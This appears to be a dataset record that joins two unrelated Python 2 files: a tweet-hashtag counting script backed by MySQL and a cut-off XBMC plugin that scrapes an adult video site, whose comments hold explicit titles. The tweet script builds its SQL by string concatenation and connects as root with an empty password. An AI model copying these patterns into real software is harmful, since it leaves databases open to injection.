'rugby', 'hockey', 'skiing']} keyword_counter = {} def expandTable(col_name, conn): cur = conn.cursor() '''try: cur.execute("SHOW COLUMNS FROM " + col_name + " LIKE 'fieldname'") for current in cur.fetchall(): print current except: print "not here"''' cur.execute("SHOW COLUMNS FROM `tweets` LIKE '" + col_name + "'") fetched = cur.fetchall() if len(fetched) == 0: print "Creating column ", col_name # if col not there, create it cur.execute("ALTER TABLE tweets ADD " + col_name + " VARCHAR(150)") else: print "Column already existing" #print fetched def doQuery(conn, writeIntoDB): cur = conn.cursor() cur.execute("SELECT id, Hashtag, Text, created_at FROM tweets") #cur.execute("SELECT id, Hashtag, Text FROM tweets WHERE id = 269") entries = cur.fetchall() #checkDate(entries) #print entries[0][0] #id #print entries[0][1] #HashTag #print entries[0][2] #Text #sys.exit() for entry in entries: if entry[1] not in tag_dict: tag_dict[entry[1]] = {} #get all hashtags tag_list = entry[2].split("#") tag_list.pop(0) #print tag_list all_hashtags = [] #remove remaining text from hashtags for tag in tag_list: helper_list = tag.split(" ", 1) helper_list[0] = helper_list[0].lower().translate(None, string.punctuation) #remove all the newlines if "\n" in helper_list[0]: helper_list = helper_list[0].split("\n", 1) #print helper_list[0] #helper_list[0].replace("...", "") if entry[1] != helper_list[0]: #print "we are unequal" #print current_tag #print helper_list[0].lower() if helper_list[0] != '': if helper_list[0] not in tag_dict[entry[1]]: #print "if" tag_dict[entry[1]][helper_list[0]] = 1 else: #print "else" tag_dict[entry[1]][helper_list[0]] += 1 all_hashtags.append('#' + helper_list[0]) #else: #print "check" final_string = "" for addtag in all_hashtags: final_string += addtag + " " if writeIntoDB == "true": #print "write in DB" cur.execute("UPDATE tweets SET other_tags='" + final_string + "' WHERE id='" + str(entry[0]) + "'") #checkAmountOfTweets(conn) '''def checkNullValues(conn): cur = conn.cursor() cur.execute("SELECT id, Hashtag, Text FROM tweets WHERE other_tags IS NULL") print cur.fetchall()''' def writeInFile(): print "Write keyword_counter into txt file" with io.FileIO("keyword_counter.txt", "w") as file: pickle.dump(keyword_counter, file) def readFromFile(filename): with io.FileIO(filename, "r") as file: my_dict = pickle.load(file) #print my_dict return my_dict def writeCSV(): print "Write # counts into csv files" #test_dict = {k: v for k, v in tag_dict["gym"].iteritems() if v == 71} #print test_dict for key in tag_dict: with io.FileIO(key + "_tags.csv", "w") as file: #fieldnames = ['id', 'value'] w = csv.writer(file, ) #w.writerow({'id': 'value'}) w.writerow(['id', 'value']) w.writerows(tag_dict[key].items()) def removeLowValues(threshold): print "Removing all small values for better visualisation" for key in tag_dict: tag_dict[key] = {k: v for k, v in tag_dict[key].iteritems() if v >= threshold} def checkDate(entries): #print entries[0][3].date() dates = {} for entry in entries: if entry[3].date() not in dates: dates[entry[3].date()] = 1 else: dates[entry[3].date()] += 1 print dates def checkAmountOfTweets(conn): '''if tag_dict: #check if there are values in dict for key in tag_dict: print key cur = conn.cursor() cur.execute("SELECT id, Hashtag, Text, created_at FROM tweets") entries = cur.fetchall()''' cur = conn.cursor() for key in tag_dict: cur.execute("SELECT id FROM tweets WHERE HashTag = '" + key + "'") entries = cur.fetchall() #print key, ": ", len(entries), " tweets" def clearDB(conn, hashtag): cur = conn.cursor() cur.execute("DELETE FROM tweets WHERE HashTag = '" + hashtag +"'") def checkOnKeywords(conn): for key in keywords: for keyword in keywords[key]: for tag_key in tag_dict: helper_dict = {k: v for k, v in tag_dict[tag_key].iteritems() if keyword in k} if tag_key not in keyword_counter: keyword_counter[tag_key] = {} if key not in keyword_counter[tag_key]: # check if there are more than one occurences of food in this tweet '''if key == 'food': print helper_dict counts = checkFoodTag(helper_dict) else:''' keyword_counter[tag_key][key] = len(helper_dict) else: #if key == 'food': #print 'ok''' #else: keyword_counter[tag_key][key] += len(helper_dict) # just for test output '''for tag_key in keyword_counter: for key in keyword_counter[tag_key]: print tag_key, ": ", key, ": ", keyword_counter[tag_key][key]''' #print keyword_counter writeInFile() #readFromFile("keyword_counter.txt") '''def checkFoodTag(dict): #print dict counter = 0 ret_value = 0 for helper_key in dict: for key in keywords['food']: if key in dict[helper_key]: counter += 1 if counter > 1: #print counter ret_value += counter counter = 0 return ret_value ''' def writeActivePassive(): category_dict = readFromFile("keyword_counter.txt") #print category_dict dict_list = [] #dict_list.append(['1', '2', '3']) '''with io.FileIO("test.csv", "w") as file: w = csv.writer(file, ) w.writerow(['Tag', 'active', 'passive']) w.writerows(dict_list) print dict_list''' for key in category_dict: dict_list.append([key, category_dict[key]['active'], category_dict[key]['passive']]) with io.FileIO("active_passive/active_passive.csv", "w") as file: w = csv.writer(file, ) w.writerow(['Tag', 'active', 'passive']) w.writerows(dict_list) def popularSports(): print "Find most popular sports" popular_dict = {} #init dict for key in keywords["kind_of_sport"]: popular_dict[key] = 0 for key in tag_dict: if key == 'sport' or key == 'sports': for key_word in keywords['kind_of_sport']: #helper_dict = {k: v for k, v in tag_dict[tag_key].iteritems() if keyword in k} #print key_word if key_word in tag_dict[key].keys(): #print key_word + " in " + key popular_dict[key_word] += tag_dict[key][key_word] #print popular_dict #print popular_dict with io.FileIO("popularSports/popularSports.csv", "w") as file: w = csv.writer(file, ) w.writerow(['sport', 'mentions']) w.writerows(popular_dict.items()) myConnection = MySQLdb.connect( host=hostname, user=username, passwd=password, db=database ) #expandTable("other_tags", myConnection) #clearDB(myConnection, "workout") doQuery(myConnection, "false") #set to true, if you want to write into the DB #checkOnKeywords(myConnection) #removeLowValues(50) #writeCSV() #writeActivePassive() popularSports() myConnection.close()
[ "import nltk\n", "import csv\n", "import pymysql\n", "import MySQLdb\n", "import sys\n", "import string\n", "import pickle\n", "import io\n", "\n", "#crawled_tags = [\"runtastic\", \"running\", \"gym\", \"workout\"]\n", "\n", "hostname = 'localhost'\n", "username = 'root'\n", "password = ''\n", "database = 'twitterdata_4'\n", "\n", "#tag_dict[crawled_tag][other_tag] = counter of occurrences\n", "tag_dict = {}\n", "\n", "#key words for keyword based filtering\n", "keywords = {'healthy': ['health', 'healthy'], \n", " 'active': ['doing', 'workout', 'playing', \n", " 'hardwork', 'fit', 'active', 'fitness'], \n", " 'passive': ['watching', 'beer', 'tv', 'couch', \n", " 'lazy', 'superbowl', 'wm', 'cheering', \n", " 'relax', 'relaxing', 'mlb'],\n", " 'food': ['food', 'eating', 'eat', 'meal', 'cook', 'cooking', 'yummy', \n", " 'foodporn', 'dinner', 'breakfast', 'delicious', 'lunch',\n", " 'restaurant', 'veggies', 'fruit', 'vegetables', 'nom', 'nomnom',\n", " 'foodgasm', 'fruits', 'healthyfood'],\n", " 'kind_of_sport': ['football', 'soccer', 'baseball', 'volleyball', 'basketball', 'golf', 'quidditch', 'swimming', 'running', 'cycling', 'boxing', 'lacrosse', 'cricket', 'tennis', 'athletics', 'rugby', 'hockey', 'skiing']}\n", " \n", " \n", "keyword_counter = {}\n", "\n", "def expandTable(col_name, conn):\n", " cur = conn.cursor()\n", " \n", " '''try:\n", " cur.execute(\"SHOW COLUMNS FROM \" + col_name + \" LIKE 'fieldname'\")\n", " for current in cur.fetchall():\n", " print current\n", " except:\n", " print \"not here\"'''\n", " \n", " cur.execute(\"SHOW COLUMNS FROM `tweets` LIKE '\" + col_name + \"'\") \n", " fetched = cur.fetchall()\n", " if len(fetched) == 0:\n", " print \"Creating column \", col_name # if col not there, create it\n", " cur.execute(\"ALTER TABLE tweets ADD \" + col_name + \" VARCHAR(150)\")\n", " else:\n", " print \"Column already existing\"\n", " #print fetched\n", " \n", "\n", "\n", "def doQuery(conn, writeIntoDB):\n", " cur = conn.cursor()\n", "\n", " cur.execute(\"SELECT id, Hashtag, Text, created_at FROM tweets\")\n", " #cur.execute(\"SELECT id, Hashtag, Text FROM tweets WHERE id = 269\")\n", " \n", " entries = cur.fetchall()\n", " \n", " #checkDate(entries)\n", " \n", " #print entries[0][0] #id\n", " #print entries[0][1] #HashTag\n", " #print entries[0][2] #Text\n", " #sys.exit()\n", "\n", " for entry in entries:\n", " \n", " if entry[1] not in tag_dict:\n", " tag_dict[entry[1]] = {}\n", " #get all hashtags\n", " tag_list = entry[2].split(\"#\")\n", " tag_list.pop(0)\n", " #print tag_list\n", " all_hashtags = []\n", " \n", " \n", " #remove remaining text from hashtags\n", " for tag in tag_list:\n", " \n", " helper_list = tag.split(\" \", 1)\n", " helper_list[0] = helper_list[0].lower().translate(None, string.punctuation)\n", " \n", " #remove all the newlines\n", " if \"\\n\" in helper_list[0]:\n", " helper_list = helper_list[0].split(\"\\n\", 1)\n", " #print helper_list[0]\n", " #helper_list[0].replace(\"...\", \"\")\n", " if entry[1] != helper_list[0]:\n", " #print \"we are unequal\"\n", " #print current_tag\n", " #print helper_list[0].lower()\n", " \n", " if helper_list[0] != '':\n", " if helper_list[0] not in tag_dict[entry[1]]:\n", " #print \"if\"\n", " tag_dict[entry[1]][helper_list[0]] = 1\n", " else:\n", " #print \"else\"\n", " tag_dict[entry[1]][helper_list[0]] += 1\n", "\n", " all_hashtags.append('#' + helper_list[0])\n", " #else:\n", " #print \"check\"\n", " final_string = \"\"\n", " for addtag in all_hashtags:\n", " final_string += addtag + \" \"\n", "\n", " if writeIntoDB == \"true\":\n", " #print \"write in DB\"\n", " cur.execute(\"UPDATE tweets SET other_tags='\" + final_string + \"' WHERE id='\" + str(entry[0]) + \"'\") \n", " #checkAmountOfTweets(conn)\n", " \n", "'''def checkNullValues(conn):\n", " cur = conn.cursor()\n", "\n", " cur.execute(\"SELECT id, Hashtag, Text FROM tweets WHERE other_tags IS NULL\")\n", " \n", " print cur.fetchall()'''\n", " \n", " \n", "def writeInFile():\n", " print \"Write keyword_counter into txt file\"\n", " with io.FileIO(\"keyword_counter.txt\", \"w\") as file:\n", " pickle.dump(keyword_counter, file)\n", "\n", "def readFromFile(filename):\n", " with io.FileIO(filename, \"r\") as file:\n", " my_dict = pickle.load(file)\n", " #print my_dict\n", " return my_dict\n", " \n", "def writeCSV():\n", " print \"Write # counts into csv files\"\n", " #test_dict = {k: v for k, v in tag_dict[\"gym\"].iteritems() if v == 71}\n", " #print test_dict\n", " for key in tag_dict:\n", " with io.FileIO(key + \"_tags.csv\", \"w\") as file:\n", " #fieldnames = ['id', 'value']\n", " w = csv.writer(file, )\n", " #w.writerow({'id': 'value'})\n", " w.writerow(['id', 'value'])\n", " w.writerows(tag_dict[key].items())\n", "\n", " \n", "def removeLowValues(threshold):\n", " print \"Removing all small values for better visualisation\"\n", " for key in tag_dict:\n", " tag_dict[key] = {k: v for k, v in tag_dict[key].iteritems() if v >= threshold}\n", " \n", "def checkDate(entries):\n", " #print entries[0][3].date()\n", " dates = {}\n", " for entry in entries:\n", " if entry[3].date() not in dates:\n", " dates[entry[3].date()] = 1\n", " else:\n", " dates[entry[3].date()] += 1\n", " print dates\n", "\n", "def checkAmountOfTweets(conn):\n", " '''if tag_dict: #check if there are values in dict\n", " for key in tag_dict:\n", " print key\n", " cur = conn.cursor()\n", " cur.execute(\"SELECT id, Hashtag, Text, created_at FROM tweets\")\n", "\n", " entries = cur.fetchall()'''\n", " cur = conn.cursor()\n", " for key in tag_dict:\n", " cur.execute(\"SELECT id FROM tweets WHERE HashTag = '\" + key + \"'\")\n", " entries = cur.fetchall()\n", " #print key, \": \", len(entries), \" tweets\"\n", " \n", " \n", "def clearDB(conn, hashtag):\n", " cur = conn.cursor()\n", " cur.execute(\"DELETE FROM tweets WHERE HashTag = '\" + hashtag +\"'\")\n", " \n", "def checkOnKeywords(conn):\n", " for key in keywords:\n", " for keyword in keywords[key]:\n", " for tag_key in tag_dict:\n", " helper_dict = {k: v for k, v in tag_dict[tag_key].iteritems() if keyword in k}\n", " if tag_key not in keyword_counter:\n", " keyword_counter[tag_key] = {}\n", " if key not in keyword_counter[tag_key]:\n", " # check if there are more than one occurences of food in this tweet\n", " '''if key == 'food':\n", " print helper_dict\n", " counts = checkFoodTag(helper_dict) \n", " else:'''\n", " keyword_counter[tag_key][key] = len(helper_dict)\n", " else:\n", " #if key == 'food':\n", " #print 'ok'''\n", " #else:\n", " keyword_counter[tag_key][key] += len(helper_dict)\n", " \n", " # just for test output\n", " '''for tag_key in keyword_counter:\n", " for key in keyword_counter[tag_key]:\n", " print tag_key, \": \", key, \": \", keyword_counter[tag_key][key]'''\n", " #print keyword_counter \n", " writeInFile()\n", " #readFromFile(\"keyword_counter.txt\")\n", "'''def checkFoodTag(dict):\n", " #print dict\n", " counter = 0\n", " ret_value = 0\n", " for helper_key in dict:\n", " for key in keywords['food']:\n", " if key in dict[helper_key]:\n", " counter += 1\n", " if counter > 1:\n", " #print counter\n", " ret_value += counter\n", " counter = 0\n", " return ret_value ''' \n", " \n", "def writeActivePassive():\n", " category_dict = readFromFile(\"keyword_counter.txt\")\n", " #print category_dict\n", " dict_list = []\n", " #dict_list.append(['1', '2', '3'])\n", " '''with io.FileIO(\"test.csv\", \"w\") as file:\n", " w = csv.writer(file, )\n", " w.writerow(['Tag', 'active', 'passive'])\n", " w.writerows(dict_list)\n", " print dict_list'''\n", " for key in category_dict:\n", " dict_list.append([key, category_dict[key]['active'], category_dict[key]['passive']])\n", " \n", " with io.FileIO(\"active_passive/active_passive.csv\", \"w\") as file: \n", " w = csv.writer(file, ) \n", " w.writerow(['Tag', 'active', 'passive'])\n", " w.writerows(dict_list)\n", " \n", "def popularSports():\n", " print \"Find most popular sports\"\n", " popular_dict = {}\n", " #init dict\n", " for key in keywords[\"kind_of_sport\"]:\n", " popular_dict[key] = 0\n", " \n", " for key in tag_dict:\n", " if key == 'sport' or key == 'sports':\n", " for key_word in keywords['kind_of_sport']:\n", " #helper_dict = {k: v for k, v in tag_dict[tag_key].iteritems() if keyword in k}\n", " #print key_word\n", " \n", " if key_word in tag_dict[key].keys():\n", " #print key_word + \" in \" + key\n", " popular_dict[key_word] += tag_dict[key][key_word]\n", " #print popular_dict\n", " #print popular_dict\n", " with io.FileIO(\"popularSports/popularSports.csv\", \"w\") as file: \n", " w = csv.writer(file, )\n", " w.writerow(['sport', 'mentions'])\n", " w.writerows(popular_dict.items())\n", " \n", "myConnection = MySQLdb.connect( host=hostname, user=username, passwd=password, db=database )\n", "#expandTable(\"other_tags\", myConnection)\n", "#clearDB(myConnection, \"workout\")\n", "doQuery(myConnection, \"false\") #set to true, if you want to write into the DB\n", "#checkOnKeywords(myConnection)\n", "#removeLowValues(50)\n", "#writeCSV()\n", "#writeActivePassive()\n", "\n", "popularSports()\n", "myConnection.close()\n", "\n", "\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01694915254237288, 0, 0, 0, 0, 0, 0, 0.01694915254237288, 0, 0, 0.02564102564102564, 0.02127659574468085, 0.0425531914893617, 0.034482758620689655, 0.038461538461538464, 0.017857142857142856, 0, 0.02666666666666667, 0.0136986301369863, 0.012345679012345678, 0, 0.008888888888888889, 0.058823529411764705, 0.058823529411764705, 0, 0, 0.030303030303030304, 0, 0.2, 0, 0, 0, 0, 0, 0, 0.2, 0.0136986301369863, 0, 0, 0.0136986301369863, 0, 0, 0, 0.043478260869565216, 0.1111111111111111, 0, 0, 0.03125, 0, 0, 0, 0.013888888888888888, 0.2, 0, 0.2, 0.041666666666666664, 0.2, 0.034482758620689655, 0.029411764705882353, 0.03225806451612903, 0.0625, 0, 0, 0.5, 0, 0, 0.038461538461538464, 0, 0, 0.041666666666666664, 0, 0.1111111111111111, 0.1111111111111111, 0.044444444444444446, 0, 0.5, 0, 0.011363636363636364, 0.07692307692307693, 0.02702702702702703, 0, 0, 0.02631578947368421, 0.02127659574468085, 0, 0.025, 0.02857142857142857, 0.021739130434782608, 0.058823529411764705, 0, 0, 0.027777777777777776, 0, 0, 0.02631578947368421, 0, 0, 0, 0.05263157894736842, 0.03225806451612903, 0, 0, 0, 0, 0, 0.030303030303030304, 0.017543859649122806, 0.03225806451612903, 0.07692307692307693, 0.03333333333333333, 0, 0, 0.012345679012345678, 0.2, 0, 0.2, 0.1111111111111111, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0, 0.043478260869565216, 0, 0.1111111111111111, 0.0625, 0, 0.013333333333333334, 0.047619047619047616, 0, 0, 0.023809523809523808, 0, 0.024390243902439025, 0, 0, 0, 0.07692307692307693, 0, 0, 0, 0.011494252873563218, 0.1111111111111111, 0.041666666666666664, 0.03125, 0, 0, 0, 0, 0, 0, 0, 0, 0.03225806451612903, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02, 0.1111111111111111, 0.1111111111111111, 0, 0, 0.014084507042253521, 0.2, 0.037037037037037035, 0, 0, 0, 0.010526315789473684, 0, 0, 0, 0.011363636363636364, 0, 0, 0.014925373134328358, 0, 0, 0, 0.02564102564102564, 0.05263157894736842, 0.037037037037037035, 0, 0.05263157894736842, 0, 0, 0, 0, 0.05714285714285714, 0, 0.024390243902439025, 0.037037037037037035, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03225806451612903, 0.14285714285714285, 0.038461538461538464, 0, 0.04, 0, 0.02564102564102564, 0, 0, 0, 0, 0, 0, 0.010752688172043012, 0.1111111111111111, 0.0136986301369863, 0.030303030303030304, 0, 0, 0.1111111111111111, 0.047619047619047616, 0, 0, 0.06666666666666667, 0, 0, 0.2, 0, 0, 0, 0.03, 0.05555555555555555, 0.047619047619047616, 0.017543859649122806, 0.01818181818181818, 0, 0.041666666666666664, 0.041666666666666664, 0.014084507042253521, 0, 0, 0, 0.07692307692307693, 0.043010752688172046, 0.024390243902439025, 0.029411764705882353, 0.02564102564102564, 0.03225806451612903, 0.047619047619047616, 0.08333333333333333, 0.045454545454545456, 0, 0, 0, 0, 1 ]
279
0.030021
false
# -*- coding: utf-8 -*- #------------------------------------------------------------ # pelisalacarta - XBMC Plugin # Canal para pornhub # http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/ #------------------------------------------------------------ import urlparse,urllib2,urllib,re import os, sys from core import logger from core import config from core import scrapertools from core.item import Item from servers import servertools __channel__ = "pornhub" __category__ = "F" __type__ = "generic" __title__ = "PornHub" __language__ = "ES" __fanart__="http://i.imgur.com/PwFvoss.jpg" DEBUG = config.get_setting("debug") def isGeneric(): return True def mainlist(item): logger.info("[pornhub.py] mainlist") itemlist = [] item.url ="http://es.pornhub.com" # Descarga la página data = get_main_page(item.url + "/categories?o=al") data = scrapertools.find_single_match(data,'<div id="categoriesStraightImages">(.*?)</ul>') ''' <li class="cat_pic" data-category="28"> <div class="category-wrapper"> <a href="/video?c=28"><img src="http://i0.cdn2b.image.pornhub.phncdn.com/m=eXs28zjadqg/static/images/categories/28.jpg" alt="Maduras" /></a> <h5> <a href="/video?c=28"><strong>Maduras</strong> <span>(<var>3950</var>)</span></a> </h5> </div> </li> ''' # Extrae las categorias patron = '<li class="cat_pic" data-category="\d+">.*?' patron += '<a href="([^"]+)">' patron += '<img src="([^"]+)" ' patron += 'alt="([^"]+)"' matches = re.compile(patron,re.DOTALL).findall(data) scrapertools.printMatches(matches) for scrapedurl,scrapedthumbnail,scrapedtitle in matches: title = scrapedtitle url = urlparse.urljoin(item.url,scrapedurl + "&o=cm") thumbnail = scrapedthumbnail #thumbnail ="" #try: itemlist.append( Item(channel=__channel__, action="peliculas", title=title, url=url , fanart=__fanart__ , thumbnail=thumbnail, folder=True) ) #except: #logger.info("pelisalacarta.channels.pornhub except") itemlist.sort(key=lambda x: x.title) return itemlist def peliculas(item): logger.info("[pornhub.py] peliculas") itemlist = [] # Descarga la página data = get_main_page(item.url) data = scrapertools.find_single_match(data,'<ul class="nf-videos videos row-4-thumbs">(.*?)<div class="pre-footer">') ''' <li class="videoblock" id="37717631" _vkey="2064578485" > <div class="wrap"> <div class="phimage"> <a href="/view_video.php?viewkey=2064578485" title="Glamorous Brunette Gets Fucked Hard On Armchair 2" class="img" data-related-url="/video/ajax_related_video?vkey=2064578485"> <div class="marker-overlays"> <var class="duration">16:29</var> <span class="hd-thumbnail">HD</span> </div> <img src="http://cdn1b.static.pornhub.phncdn.com/www-static/images/blank.gif" alt="Glamorous Brunette Gets Fucked Hard On Armchair 2" data-smallthumb="http://i1.cdn2b.image.pornhub.phncdn.com/m=eGcE8daaaa/videos/201501/19/37717631/original/12.jpg" data-mediumthumb="http://i1.cdn2b.image.pornhub.phncdn.com/m=eWdT8daaaa/videos/201501/19/37717631/original/12.jpg" class="thumb" width="150" class="rotating" id="238153595837717631" onmouseover="startThumbChange(37717631, '238153595837717631', 16, 'http://i1.cdn2b.image.pornhub.phncdn.com/m=eWdT8daaaa/videos/201501/19/37717631/original/{index}.jpg');" onmouseout="endThumbChange('238153595837717631');" title="Glamorous Brunette Gets Fucked Hard On Armchair 2" /> </a> </div> <div class="add-to-playlist-icon display-none"> <button type="button" data-title="Agregar a una lista de reproducción" class="tooltipTrig open-playlist-link playlist-trigger" onclick="return false;" data-rel="2064578485" >+</button> </div> <div class="thumbnail-info-wrapper clearfix"> <span class="title"> <a href="/view_video.php?viewkey=2064578485" title="Glamorous Brunette Gets Fucked Hard On Armchair 2">Glamorous Brunette Gets Fucked Hard On Armchair 2</a> </span> <span class="views"><var>35</var> vistas</span> <div class="rating-container up"> <div class="main-sprite icon"></div> <div class="value">100%</div> </div> <var class="added">5 hours ago</var> </div> </div> </li> ''' # Extrae las peliculas patron = '<div class="phimage">.*?' patron += '<a href="/view_video.php\?viewkey=([^"]+)" title="([^"]+).*?' patron += '<var class="duration">([^<]+)</var>(.*?)</div>.*?' patron += 'data-smallthumb="([^"]+)"' matches = re.compile(patron,re.DOTALL).findall(data) scrapertools.printMatches(matches) for viewkey,scrapedtitle,duration,scrapedhd,thumbnail in matches: title=scrapedtitle.replace('&amp;','&')+" ("+duration+")" scrapedhd = scrapertools.find_single_match(scrapedhd,'<span class="hd-thumbnail">(.*?)</span>') if (scrapedhd == 'HD') : title += ' [HD]' url= 'http://es.pornhub.com/embed/' + viewkey if (DEBUG): logger.info("title=["+title+"], url=["+url+"], thumbnail=["+thumbnail+"]") itemlist.append( Item(channel=__channel__, action="play", title=title , url=url ,fanart=__fanart__, thumbnail=thumbnail) ) # Paginador patron = '<li class="page_next"><a href="([^"]+)"' matches = re.compile(patron,re.DOTALL).findall(data) scrapertools.printMatches(matches) if len(matches)>0: url=urlparse.urljoin("http://es.pornhub.com",matches[0].replace('&amp;','&')) itemlist.append( Item(channel=__channel__, action="peliculas", title=">> Página siguiente" ,fanart=__fanart__, url=url)) return itemlist def play(item): logger.info("[pornhub.py] play") itemlist=[] #item.url='http://es.pornhub.com/embed/' + viewkey # Descarga la página data = get_main_page(item.url) data = scrapertools.find_single_match(data,'html5Config([^}]+)},') url = scrapertools.get_match(data,"src\s+:\s+'([^']+)',") #url= "http://cdn2b.embed.pornhub.phncdn.com/videos/201501/19/37717631/480P_600K_37717631.mp4?rs=200&ri=2500&ip=188.79.24.200&s=1421873759&e=1421880959&h=6cd0058bc8e5abac9ccfdaa50c6bdf19" #logger.info("url="+url) server="Directo" itemlist.append( Item(channel=__channel__, title="" , url=url , server=server, folder=False) ) return itemlist def get_main_page(url): logger.info("[pornhub.py] get_main_page") headers=[] headers.append(["User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:20.0) Gecko/20100101 Firefox/20.0"]) headers.append(["Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"]) headers.append(["Accept-Language","es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3"]) headers.append(["Accept-Encoding","gzip, deflate"]) # Descarga la página data = scrapertools.cachePage(url,headers=headers) #logger.info("pelisalacarta.channels.pornhub data="+data) return data
[ "# -*- coding: utf-8 -*-\n", "#------------------------------------------------------------\n", "# pelisalacarta - XBMC Plugin\n", "# Canal para pornhub\n", "# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/\n", "#------------------------------------------------------------\n", "import urlparse,urllib2,urllib,re\n", "import os, sys\n", "\n", "from core import logger\n", "from core import config\n", "from core import scrapertools\n", "from core.item import Item\n", "from servers import servertools\n", "\n", "__channel__ = \"pornhub\"\n", "__category__ = \"F\"\n", "__type__ = \"generic\"\n", "__title__ = \"PornHub\"\n", "__language__ = \"ES\"\n", "__fanart__=\"http://i.imgur.com/PwFvoss.jpg\"\n", "\n", "DEBUG = config.get_setting(\"debug\")\n", "\n", "def isGeneric():\n", " return True\n", "\n", "def mainlist(item):\n", " logger.info(\"[pornhub.py] mainlist\")\n", " itemlist = []\n", " \n", " item.url =\"http://es.pornhub.com\"\n", " \n", " # Descarga la página\n", " data = get_main_page(item.url + \"/categories?o=al\")\n", " data = scrapertools.find_single_match(data,'<div id=\"categoriesStraightImages\">(.*?)</ul>')\n", " \n", " '''\n", " <li class=\"cat_pic\" data-category=\"28\">\n", " <div class=\"category-wrapper\">\n", " <a href=\"/video?c=28\"><img src=\"http://i0.cdn2b.image.pornhub.phncdn.com/m=eXs28zjadqg/static/images/categories/28.jpg\" alt=\"Maduras\" /></a>\n", " <h5>\n", " <a href=\"/video?c=28\"><strong>Maduras</strong>\n", " <span>(<var>3950</var>)</span></a>\n", " </h5>\n", " </div>\n", " </li>\n", " '''\n", " \n", " # Extrae las categorias\n", " patron = '<li class=\"cat_pic\" data-category=\"\\d+\">.*?'\n", " patron += '<a href=\"([^\"]+)\">'\n", " patron += '<img src=\"([^\"]+)\" '\n", " patron += 'alt=\"([^\"]+)\"'\n", " \n", " matches = re.compile(patron,re.DOTALL).findall(data)\n", " scrapertools.printMatches(matches)\n", " \n", " for scrapedurl,scrapedthumbnail,scrapedtitle in matches:\n", " title = scrapedtitle\n", " url = urlparse.urljoin(item.url,scrapedurl + \"&o=cm\")\n", " thumbnail = scrapedthumbnail\n", " #thumbnail =\"\"\n", " \n", " #try:\n", " itemlist.append( Item(channel=__channel__, action=\"peliculas\", title=title, url=url , fanart=__fanart__ , thumbnail=thumbnail, folder=True) )\n", " #except:\n", " #logger.info(\"pelisalacarta.channels.pornhub except\")\n", " \n", " itemlist.sort(key=lambda x: x.title)\n", " return itemlist\n", "\n", "def peliculas(item):\n", " logger.info(\"[pornhub.py] peliculas\")\n", " itemlist = []\n", " \n", " # Descarga la página\n", " data = get_main_page(item.url)\n", " data = scrapertools.find_single_match(data,'<ul class=\"nf-videos videos row-4-thumbs\">(.*?)<div class=\"pre-footer\">')\n", " \n", " '''\n", " <li class=\"videoblock\" id=\"37717631\" _vkey=\"2064578485\" >\n", " <div class=\"wrap\">\n", " <div class=\"phimage\">\n", " <a href=\"/view_video.php?viewkey=2064578485\" title=\"Glamorous Brunette Gets Fucked Hard On Armchair 2\" class=\"img\" data-related-url=\"/video/ajax_related_video?vkey=2064578485\">\n", " <div class=\"marker-overlays\">\n", " <var class=\"duration\">16:29</var>\n", " <span class=\"hd-thumbnail\">HD</span>\n", " </div>\n", " <img src=\"http://cdn1b.static.pornhub.phncdn.com/www-static/images/blank.gif\" alt=\"Glamorous Brunette Gets Fucked Hard On Armchair 2\" data-smallthumb=\"http://i1.cdn2b.image.pornhub.phncdn.com/m=eGcE8daaaa/videos/201501/19/37717631/original/12.jpg\" data-mediumthumb=\"http://i1.cdn2b.image.pornhub.phncdn.com/m=eWdT8daaaa/videos/201501/19/37717631/original/12.jpg\" class=\"thumb\" width=\"150\" class=\"rotating\" id=\"238153595837717631\" onmouseover=\"startThumbChange(37717631, '238153595837717631', 16, 'http://i1.cdn2b.image.pornhub.phncdn.com/m=eWdT8daaaa/videos/201501/19/37717631/original/{index}.jpg');\" onmouseout=\"endThumbChange('238153595837717631');\" title=\"Glamorous Brunette Gets Fucked Hard On Armchair 2\" />\n", " </a>\n", " </div>\n", " <div class=\"add-to-playlist-icon display-none\">\n", " <button type=\"button\" data-title=\"Agregar a una lista de reproducción\" class=\"tooltipTrig open-playlist-link playlist-trigger\" onclick=\"return false;\" data-rel=\"2064578485\" >+</button>\n", " </div>\n", " <div class=\"thumbnail-info-wrapper clearfix\">\n", " <span class=\"title\">\n", " <a href=\"/view_video.php?viewkey=2064578485\" title=\"Glamorous Brunette Gets Fucked Hard On Armchair 2\">Glamorous Brunette Gets Fucked Hard On Armchair 2</a>\n", " </span>\n", " <span class=\"views\"><var>35</var> vistas</span>\n", " <div class=\"rating-container up\">\n", " <div class=\"main-sprite icon\"></div>\n", " <div class=\"value\">100%</div>\n", " </div>\n", " <var class=\"added\">5 hours ago</var>\n", " </div>\n", " </div>\n", " </li>\n", " '''\n", " \n", " # Extrae las peliculas\n", " patron = '<div class=\"phimage\">.*?'\n", " patron += '<a href=\"/view_video.php\\?viewkey=([^\"]+)\" title=\"([^\"]+).*?'\n", " patron += '<var class=\"duration\">([^<]+)</var>(.*?)</div>.*?'\n", " patron += 'data-smallthumb=\"([^\"]+)\"'\n", " \n", " matches = re.compile(patron,re.DOTALL).findall(data)\n", " scrapertools.printMatches(matches)\n", " \n", " for viewkey,scrapedtitle,duration,scrapedhd,thumbnail in matches: \n", " title=scrapedtitle.replace('&amp;','&')+\" (\"+duration+\")\"\n", " scrapedhd = scrapertools.find_single_match(scrapedhd,'<span class=\"hd-thumbnail\">(.*?)</span>')\n", " if (scrapedhd == 'HD') : title += ' [HD]'\n", " url= 'http://es.pornhub.com/embed/' + viewkey\n", " \n", " if (DEBUG): logger.info(\"title=[\"+title+\"], url=[\"+url+\"], thumbnail=[\"+thumbnail+\"]\")\n", " itemlist.append( Item(channel=__channel__, action=\"play\", title=title , url=url ,fanart=__fanart__, thumbnail=thumbnail) )\n", " \n", " # Paginador\n", " patron = '<li class=\"page_next\"><a href=\"([^\"]+)\"'\n", " \n", " matches = re.compile(patron,re.DOTALL).findall(data)\n", " scrapertools.printMatches(matches)\n", " \n", " if len(matches)>0:\n", " url=urlparse.urljoin(\"http://es.pornhub.com\",matches[0].replace('&amp;','&'))\n", " itemlist.append( 